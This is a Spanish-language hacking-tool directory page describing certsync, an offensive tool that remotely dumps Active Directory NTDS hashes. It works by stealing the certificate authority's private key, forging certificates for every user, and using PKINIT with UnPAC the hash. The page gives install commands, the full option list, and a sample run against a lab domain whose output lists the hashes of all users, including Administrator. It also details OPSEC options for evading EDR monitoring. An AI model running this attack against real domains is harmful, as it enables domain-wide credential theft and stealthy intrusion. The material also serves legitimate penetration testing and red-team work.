Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
certsync — Volcar NTDS con certificados dorados y desempaquetar el hash | Kitploit
Herramientas/GitHubGitHub/zblurx/certsync
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónAutenticaciónRed Teaming
GitHubzblurx/certsync

certsync

Volcar NTDS con certificados dorados y desempaquetar el hash

Ver Repositorio
6496844hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

certsync

certsync es una nueva técnica para volcar NTDS de forma remota, pero esta vez sin DRSUAPI: utiliza golden certificate y UnPAC the hash. Funciona en varios pasos:

  1. Volcar lista de usuarios, información de CA y CRL desde LDAP
  2. Volcar certificado de CA y clave privada
  3. Forjar fuera de línea un certificado para cada usuario
  4. Realizar UnPAC the hash para cada usuario y obtener hashes nt y lm
root@kitploit:~
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

Contrario a lo que podríamos pensar, el ataque no es para nada más lento.

Table of Contents

  • certsync
    • Tabla de contenidos
    • Instalación
    • Uso
    • Por qué
    • Requisitos
    • Limitaciones
    • OPSEC
    • Créditos

Instalación

Localmente:

root@kitploit:~
git clone https://github.com/zblurx/certsync
cd certsync
pip install .

Desde Pypi:

root@kitploit:~
pip install certsync

Desde BlackArch:

root@kitploit:~
pacman -S certsync

Paquetes para todas las distribuciones:

Packaging status

Uso

root@kitploit:~
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
                [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and UnPAC the hash

options:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -outputfile OUTPUTFILE
                        base output filename

CA options:
  -ca-pfx pfx/p12 file name
                        Path to CA certificate. If used, will skip backup of CA certificate and private key
  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authentication options:
  -d domain.local, -domain domain.local
                        Domain name
  -u username, -username username
                        Username
  -p password, -password password
                        Password
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
  -scheme ldap scheme
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
  -ldap-filter LDAP_FILTER
                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
  -template cert.pfx    base template to use in order to forge certificates
  -timeout timeout      Timeout between PKINIT connection
  -jitter jitter        Jitter between PKINIT connection
  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

Por qué

DSRUAPI es cada vez más monitoreado y a veces restringido por soluciones EDR. Además, certsync no requiere usar un Administrador de Dominio, solo requiere un Administrador de CA.

Requisitos

Este ataque necesita:

  • Una CA Empresarial configurada en un servidor ADCS en el dominio,
  • PKINIT funcionando,
  • Una cuenta de dominio que sea administrador local en el servidor ADCS, o una exportación del certificado de CA y la clave privada.

Limitaciones

Dado que no podemos hacer PKINIT para usuarios que están revocados, no podemos volcar sus hashes.

OPSEC

Se agregaron algunas opciones para personalizar el comportamiento de la herramienta:

  • -ldap-filter: cambia el filtro LDAP utilizado para seleccionar nombres de usuario a certsync.
  • -template: usa un certificado ya entregado para imitarlo al forjar certificados de usuarios.
  • -timeout y -jitter: cambian el tiempo de espera entre solicitudes de autenticación PKINIT.
  • -randomize: Por defecto, todos los certificados de usuario forjados tendrán la misma clave privada, número de serie y fechas de validez. Este parámetro los aleatorizará, pero la forja tomará más tiempo.

Créditos

  • Olivier Lyak por todo su trabajo en ADCS y certipy.
  • Benjamin Delpy por la técnica de unPAC the hash.
  • Will Schroeder y Lee Christensen por Certified Pre-Owned y Certify.
  • Mayfly por su gran laboratorio: GOAD.
Descargar herramienta